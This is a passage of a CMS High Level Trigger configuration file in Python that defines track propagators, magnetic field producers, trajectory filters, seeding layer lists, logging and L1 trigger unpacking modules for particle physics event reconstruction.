\"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagatorAnyOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmartPropagatorOpposite = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorOpposite\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmootherRK = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"SmootherRK\" ),\n Propagator = cms.string( \"RungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SteppingHelixPropagatorAlong = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorAlong\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SteppingHelixPropagatorAny = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.StripCPEfromTrackAngleESProducer = cms.ESProducer( \"StripCPEfromTrackAngleESProducer\",\n ComponentName = cms.string( \"StripCPEfromTrackAngle\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TTRHBuilderPixelOnly = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"TTRHBuilderPixelOnly\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"PixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TrackerDigiGeometryESModule = cms.ESProducer( \"TrackerDigiGeometryESModule\",\n alignmentsLabel = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( True ),\n fromDDD = cms.bool( True )\n)\nprocess.TrackerGeometricDetESModule = cms.ESProducer( \"TrackerGeometricDetESModule\",\n fromDDD = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TrackerRecoGeometryESProducer = cms.ESProducer( \"TrackerRecoGeometryESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TransientTrackBuilderESProducer = cms.ESProducer( \"TransientTrackBuilderESProducer\",\n ComponentName = cms.string( \"TransientTrackBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.VBF0 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"0t\" ),\n version = cms.string( \"grid_1103l_071212_2t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_0\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF20 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_2t\" ),\n version = cms.string( \"grid_1103l_071212_2t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_20\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF30 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_3t\" ),\n version = cms.string( \"grid_1103l_071212_3t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_30\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF35 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_3_5t\" ),\n version = cms.string( \"grid_1103l_071212_3_5t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_35\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF38 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"090322_3_8t\" ),\n version = cms.string( \"grid_1103l_090322_3_8t\" ),\n overrideMasterSector = cms.bool( False ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_38\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( 14100, 14200, 17600, 17800, 17900, 18100, 18300, 18400, 18600, 23100, 23300, 23400, 23600, 23800, 23900, 24100, 28600, 28800, 28900, 29100, 29300, 29400, 29600, 28609, 28809, 28909, 29109, 29309, 29409, 29609, 28610, 28810, 28910, 29110, 29310, 29410, 29610, 28611, 28811, 28911, 29111, 29311, 29411, 29611 ),\n scalingFactors = cms.vdouble( 1.0, 1.0, 0.994, 1.004, 1.004, 1.005, 1.004, 1.004, 0.994, 0.965, 0.958, 0.958, 0.953, 0.958, 0.958, 0.965, 0.918, 0.924, 0.924, 0.906, 0.924, 0.924, 0.918, 0.991, 0.998, 0.998, 0.978, 0.998, 0.998, 0.991, 0.991, 0.998, 0.998, 0.978, 0.998, 0.998, 0.991, 0.991, 0.998, 0.998, 0.978, 0.998, 0.998, 0.991 ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF40 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_4t\" ),\n version = cms.string( \"grid_1103l_071212_4t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_40\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.WithTrackAngle = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"WithTrackAngle\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n PixelCPE = cms.string( \"PixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.ZdcHardcodeGeometryEP = cms.ESProducer( \"ZdcHardcodeGeometryEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.bJetRegionalTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"bJetRegionalTrajectoryBuilder\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"bJetRegionalTrajectoryFilter\" ),\n maxCand = cms.int32( 1 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.bJetRegionalTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"bJetRegionalTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 1.0 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 8 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.ckfBaseTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"ckfBaseTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 0.9 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.hcalRecAlgos = cms.ESProducer( \"HcalRecAlgoESProducer\",\n SeverityLevels = cms.VPSet( \n cms.PSet( Level = cms.int32( 0 ),\n RecHitFlags = cms.vstring( '' ),\n ChannelStatus = cms.vstring( '' )\n )\n ),\n RecoveredRecHitBits = cms.vstring( '' ),\n appendToDataLabel = cms.string( \"\" ),\n DropChannelStatusBits = cms.vstring( '' )\n)\nprocess.hcal_db_producer = cms.ESProducer( \"HcalDbProducer\",\n appendToDataLabel = cms.string( \"\" ),\n dump = cms.untracked.vstring( '' )\n)\nprocess.hltCkfTrajectoryBuilderMumu = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltCkfTrajectoryBuilderMumu\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"hltCkfTrajectoryFilterMumu\" ),\n maxCand = cms.int32( 3 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.hltCkfTrajectoryFilterMumu = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltCkfTrajectoryFilterMumu\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 3.0 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 5 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.hltKFFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltKFFitter\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.hltKFFittingSmoother = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltKFFittingSmoother\" ),\n Fitter = cms.string( \"hltKFFitter\" ),\n Smoother = cms.string( \"hltKFSmoother\" ),\n EstimateCut = cms.double( -1.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.hltKFSmoother = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltKFSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.mixedlayerpairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"MixedLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg',\n 'FPix2_pos+TEC1_pos',\n 'FPix2_pos+TEC2_pos',\n 'TEC1_pos+TEC2_pos',\n 'TEC2_pos+TEC3_pos',\n 'FPix2_neg+TEC1_neg',\n 'FPix2_neg+TEC2_neg',\n 'TEC1_neg+TEC2_neg',\n 'TEC2_neg+TEC3_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( \n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 1 ),\n useRingSlector = cms.bool( True )\n )\n)\nprocess.muonCkfTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"muonCkfTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minPt = cms.double( 0.9 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n chargeSignificance = cms.double( -1.0 )\n )\n)\nprocess.navigationSchoolESProducer = cms.ESProducer( \"NavigationSchoolESProducer\",\n ComponentName = cms.string( \"SimpleNavigationSchool\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.pixellayerpairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"PixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( )\n)\nprocess.pixellayertriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"PixelLayerTriplets\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"TTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( )\n)\nprocess.sistripconn = cms.ESProducer( \"SiStripConnectivity\" )\nprocess.softLeptonByDistance = cms.ESProducer( \"LeptonTaggerByDistanceESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n distance = cms.double( 0.5 )\n)\nprocess.softLeptonByPt = cms.ESProducer( \"LeptonTaggerByPtESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ipSign = cms.string( \"any\" )\n)\nprocess.trackCounting3D2nd = cms.ESProducer( \"TrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n nthTrack = cms.int32( 2 ),\n impactParameterType = cms.int32( 0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = cms.double( 5.0 ),\n maximumDistanceToJetAxis = cms.double( 0.07 ),\n trackQualityClass = cms.string( \"any\" )\n)\nprocess.trajBuilderL3 = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"trajBuilderL3\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"trajFilterL3\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.trajFilterL3 = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"trajFilterL3\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minPt = cms.double( 0.9 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 7 ),\n maxConsecLostHits = cms.int32( 1 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minimumNumberOfHits = cms.int32( 5 )\n )\n)\nprocess.trajectoryCleanerBySharedHits = cms.ESProducer( \"TrajectoryCleanerESProducer\",\n ComponentName = cms.string( \"TrajectoryCleanerBySharedHits\" ),\n appendToDataLabel = cms.string( \"\" ),\n fractionShared = cms.double( 0.5 )\n)\n\nprocess.DQM = cms.Service( \"DQM\",\n)\nprocess.DQMStore = cms.Service( \"DQMStore\",\n)\nprocess.DTDataIntegrityTask = cms.Service( \"DTDataIntegrityTask\",\n getSCInfo = cms.untracked.bool( True ),\n hltMode = cms.untracked.bool( True )\n)\nprocess.FUShmDQMOutputService = cms.Service( \"FUShmDQMOutputService\",\n lumiSectionsPerUpdate = cms.double( 1.0 ),\n useCompression = cms.bool( True ),\n compressionLevel = cms.int32( 1 ),\n)\nprocess.MessageLogger = cms.Service( \"MessageLogger\",\n destinations = cms.untracked.vstring( 'warnings',\n 'errors',\n 'infos',\n 'debugs',\n 'cout',\n 'cerr',\n 'log4cplus' ),\n categories = cms.untracked.vstring( 'FwkJob',\n 'FwkReport',\n 'FwkSummary',\n 'Root_NoDictionary' ),\n statistics = cms.untracked.vstring( 'cerr' ),\n cerr = cms.untracked.PSet( \n INFO = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n noTimeStamps = cms.untracked.bool( False ),\n FwkReport = cms.untracked.PSet( \n reportEvery = cms.untracked.int32( 1 ),\n limit = cms.untracked.int32( 0 )\n ),\n default = cms.untracked.PSet( limit = cms.untracked.int32( 10000000 ) ),\n Root_NoDictionary = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n FwkJob = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n FwkSummary = cms.untracked.PSet( \n reportEvery = cms.untracked.int32( 1 ),\n limit = cms.untracked.int32( 10000000 )\n ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n cout = cms.untracked.PSet( \n threshold = cms.untracked.string( \"ERROR\" ),\n ),\n errors = cms.untracked.PSet( \n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n warnings = cms.untracked.PSet( \n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n infos = cms.untracked.PSet( \n Root_NoDictionary = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n debugs = cms.untracked.PSet( \n placeholder = cms.untracked.bool( True ),\n threshold = cms.untracked.string( \"INFO\" ),\n ),\n fwkJobReports = cms.untracked.vstring( 'FrameworkJobReport' ),\n FrameworkJobReport = cms.untracked.PSet( \n default = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),\n FwkJob = cms.untracked.PSet( limit = cms.untracked.int32( 10000000 ) )\n ),\n)\nprocess.MicroStateService = cms.Service( \"MicroStateService\",\n)\nprocess.ModuleWebRegistry = cms.Service( \"ModuleWebRegistry\",\n)\nprocess.PrescaleService = cms.Service( \"PrescaleService\",\n lvl1DefaultLabel = cms.untracked.string( \"0\" ),\n lvl1Labels = cms.vstring( '0',\n '1',\n '2',\n '3',\n '4',\n '5',\n '6',\n '7',\n '8',\n '9',\n '10' ),\n prescaleTable = cms.VPSet( \n )\n)\nprocess.TimeProfilerService = cms.Service( \"TimeProfilerService\",\n)\nprocess.UpdaterService = cms.Service( \"UpdaterService\",\n)\nprocess.hltGetRaw = cms.EDAnalyzer( \"HLTGetRaw\",\n RawDataCollection = cms.InputTag( \"source\" )\n)\nprocess.hltTriggerType = cms.EDFilter( \"HLTTriggerTypeFilter\",\n SelectedTriggerType = cms.int32( 1 )\n)\nprocess.hltEventNumber = cms.EDFilter( \"HLTEventNumberFilter\",\n period = cms.uint32( 4096 ),\n invert = cms.bool( True )\n)\nprocess.hltGtDigis = cms.EDProducer( \"L1GlobalTriggerRawToDigi\",\n DaqGtInputTag = cms.InputTag( \"source\" ),\n DaqGtFedId = cms.untracked.int32( 813 ),\n ActiveBoardsMask = cms.uint32( 0xffff ),\n UnpackBxInEvent = cms.int32( 1 )\n)\nprocess.hltGctDigis = cms.EDProducer( \"GctRawToDigi\",\n inputLabel = cms.InputTag( \"source\" ),\n gctFedId = cms.int32( 745 ),\n hltMode = cms.bool( True ),\n unpackSharedRegions = cms.bool( False ),\n unpackerVersion = cms.uint32( 0 )\n)\nprocess.hltL1GtObjectMap = cms.EDProducer( \"L1GlobalTrigger\",\n GmtInputTag = cms.InputTag( \"hltGtDigis\" ),\n GctInputTag = cms.InputTag( \"hltGctDigis\" ),\n CastorInputTag = cms.InputTag( \"castorL1Digis\" ),\n ProduceL1GtDaqRecord = cms.bool( False ),\n ProduceL1GtEvmRecord = cms.bool( False ),\n ProduceL1GtObjectMapRecord = cms.bool( True ),\n WritePsbL1GtDaqRecord = cms.bool( False ),\n ReadTechnicalTriggerRecords = cms.bool( True ),\n EmulateBxInEvent = cms.int32( 1 ),\n AlternativeNrBxBoardDaq = cms.uint32( 0 ),\n AlternativeNrBxBoardEvm = cms.uint32( 0 ),\n BstLengthBytes = cms.int32( -1 ),\n TechnicalTriggersInputTags = cms.VInputTag( 'simBscDigis' ),\n RecordLength = cms.vint32( 3, 0 )\n)\nprocess.hltL1extraParticles = cms.EDProducer( \"L1ExtraParticlesProd\",\n produceMuonParticles = cms.bool( True ),\n muonSource = cms.InputTag( \"hltGtDigis\" ),\n produceCaloParticles = cms.bool( True ),\n isolatedEmSource = cms.InputTag( 'hltGctDigis','isoEm' ),\n nonIsolatedEmSource = cms.InputTag( 'hltGctDigis','nonIsoEm' ),\n centralJetSource = cms.InputTag( 'hltGctDigis','cenJets' ),\n forwardJetSource = cms.InputTag( 'hltGctDigis','forJets' ),\n tauJetSource = cms.InputTag( 'hltGctDigis','tauJets' ),\n etTotalSource = cms.InputTag( \"hltGctDigis\" ),\n etHadSource = cms.InputTag( \"hltGctDigis\" ),\n etMissSource = cms.InputTag( \"hltGctDigis\" ),\n htMissSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingEtSumsSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingBitCountsSource = cms.InputTag( \"hltGctDigis\" ),\n centralBxOnly = cms.bool( True ),\n ignoreHtMiss = cms.bool( False )\n)\nprocess.hltOfflineBeamSpot = cms.EDProducer( \"BeamSpotProducer\" )\nprocess.hltPreFirstPath = cms.EDFilter( \"HLTPrescaler\" )\nprocess.hltBoolFirstPath = cms.EDFilter( \"HLTBool\",\n result = cms.bool( False )\n)\nprocess.hltEcalRawToRecHitFacility = cms.EDProducer( \"EcalRawToRecHitFacility\",\n sourceTag = cms.InputTag( \"source\" ),\n workerName = cms.string( \"\" )\n)\nprocess.hltEcalRegionalRestFEDs = cms.EDProducer( \"EcalRawToRecHitRoI\",\n sourceTag = cms.InputTag( 